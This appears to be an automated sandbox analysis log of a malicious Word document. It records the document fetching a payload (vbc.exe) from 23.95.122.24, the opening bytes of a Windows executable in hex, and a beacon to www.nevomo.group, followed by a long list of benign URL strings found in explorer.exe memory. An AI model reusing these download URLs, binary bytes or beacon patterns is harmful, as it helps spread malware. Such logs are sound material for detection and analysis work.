HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 08 Apr 2021 11:18:03 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27Last-Modified: Thu, 08 Apr 2021 04:59:44 GMTETag: "5e800-5bf6eea6ef000"Accept-Ranges: bytesContent-Length: 387072Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 8b 15 e2 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 ae 04 00 00 ec 96 03 00 00 00 00 a3 41 00 00 00 10 00 00 00 c0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 9b 03 00 04 00 00 36 08 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 18 9b 03 67 00 00 00 84 0d 9b 03 3c 00 00 00 00 20 9b 03 a0 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 9b 03 9c 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fa 9a 03 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 9a 03 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 63 ac 04 00 00 10 00 00 00 ae 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 d2 95 03 00 c0 04 00 00 1c 00 00 00 b2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 69 70 75 68 00 00 01 00 00 00 00 a0 9a 03 00 02 00 00 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 75 74 61 00 00 00 79 11 00 00 00 b0 9a 03 00 04 00 00 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 65 77 00 00 00 00 07 49 00 00 00 d0 9a 03 00 4a 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 a0 2c 00 00 00 20 9b 03 00 2e 00 00 00 1e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 99 00 00 00 50 9b 03 00 9a 00 00 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /nnmd/?K6AlT=OH405Zk&2dul=05SaklKxrHZkuL+bQQlctvxV8/3Vwz7X9JaEuMMyoQZG08GIgMZNFCY5Thf3tPL/fx/p1A== HTTP/1.1Host: www.nevomo.groupConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 213.186.33.5 213.186.33.5

Source: Joe Sandbox View	ASN Name: OVHFR OVHFR
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: global traffic	HTTP traffic detected: GET /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/................................................................................dot HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 23.95.122.24Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /zyo/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.122.24Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24

Source: C:\Windows\explorer.exe

Code function: 13_2_0293C302 getaddrinfo,setsockopt,recv,

13_2_0293C302

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24814E40-30CA-4646-ACFF-79FC9E14ADCB}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/................................................................................dot HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 23.95.122.24Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /zyo/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.122.24Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nnmd/?K6AlT=OH405Zk&2dul=05SaklKxrHZkuL+bQQlctvxV8/3Vwz7X9JaEuMMyoQZG08GIgMZNFCY5Thf3tPL/fx/p1A== HTTP/1.1Host: www.nevomo.groupConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.nevomo.group

Source: explorer.exe, 0000000D.00000000.2134641767.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134641767.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 0000000D.00000000.2120167931.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 0000000D.00000000.2118494923.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 0000000D.00000000.2118494923.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 0000000D.00000000.2114059517.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
